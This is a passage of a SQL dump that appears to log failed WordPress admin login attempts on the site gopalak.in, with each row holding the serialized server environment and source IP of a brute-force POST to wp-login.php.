00:00:00'),(94339,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55620\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745685724.689837;s:12:\"REQUEST_TIME\";i:1745685724;}}','198.54.114.29',0,'2025-04-26 22:12:06','1970-01-01 00:00:00'),(94340,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54312\";s:11:\"REMOTE_ADDR\";s:14:\"162.213.255.38\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745686150.519551;s:12:\"REQUEST_TIME\";i:1745686150;}}','162.213.255.38',0,'2025-04-26 22:19:13','1970-01-01 00:00:00'),(94341,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59258\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.235.223\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745686577.607795;s:12:\"REQUEST_TIME\";i:1745686577;}}','162.0.235.223',0,'2025-04-26 22:26:19','1970-01-01 00:00:00'),(94342,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41698\";s:11:\"REMOTE_ADDR\";s:10:\"77.72.1.49\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745686994.900094;s:12:\"REQUEST_TIME\";i:1745686994;}}','77.72.1.49',0,'2025-04-26 22:33:16','1970-01-01 00:00:00'),(94343,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37204\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.153\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745687418.026365;s:12:\"REQUEST_TIME\";i:1745687418;}}','199.188.201.153',0,'2025-04-26 22:40:19','1970-01-01 00:00:00'),(94344,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36884\";s:11:\"REMOTE_ADDR\";s:12:\"5.202.15.246\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745687843.0167601;s:12:\"REQUEST_TIME\";i:1745687843;}}','5.202.15.246',0,'2025-04-26 22:47:24','1970-01-01 00:00:00'),(94345,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:4:\"2138\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745688266.2204621;s:12:\"REQUEST_TIME\";i:1745688266;}}','91.151.95.70',0,'2025-04-26 22:54:28','1970-01-01 00:00:00'),(94346,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"95\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39880\";s:11:\"REMOTE_ADDR\";s:13:\"51.178.81.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745688682.800292;s:12:\"REQUEST_TIME\";i:1745688682;}}','51.178.81.248',0,'2025-04-26 23:01:24','1970-01-01 00:00:00'),(94347,0,'a:2:{s:8:\"username\";s:11:\"yanz@123457\";s:6:\"server\";a:33:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58140\";s:11:\"REMOTE_ADDR\";s:14:\"162.243.225.68\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745689030.8163469;s:12:\"REQUEST_TIME\";i:1745689030;}}','162.243.225.68',0,'2025-04-26 23:07:12','1970-01-01 00:00:00'),(94348,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38180\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.98\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745689103.2301061;s:12:\"REQUEST_TIME\";i:1745689103;}}','198.54.114.98',0,'2025-04-26 23:08:24','1970-01-01 00:00:00'),(94349,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"32812\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.114.125\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s